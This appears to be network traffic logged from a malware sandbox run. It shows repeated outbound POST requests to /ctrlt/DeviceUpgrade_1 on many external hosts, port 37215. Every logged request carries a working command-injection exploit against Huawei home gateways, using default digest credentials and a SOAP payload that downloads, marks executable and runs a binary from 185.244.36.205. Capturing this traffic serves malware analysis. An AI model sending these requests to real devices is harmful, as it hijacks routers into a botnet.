                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1290192.168.2.1553918156.4.147.21337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397746086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1291192.168.2.1533190190.176.44.14937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397746086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1292192.168.2.1542030181.156.189.4937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397768021 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1293192.168.2.154269231.91.46.20037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397804976 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1294192.168.2.154918631.85.162.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397804976 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1295192.168.2.1555430181.11.6.21837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397828102 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1296192.168.2.1556524186.107.40.10737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397855043 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1297192.168.2.1542646222.70.214.9237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397866964 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1298192.168.2.154636645.164.254.19937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397886038 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1299192.168.2.1534468156.190.46.6137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397902966 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
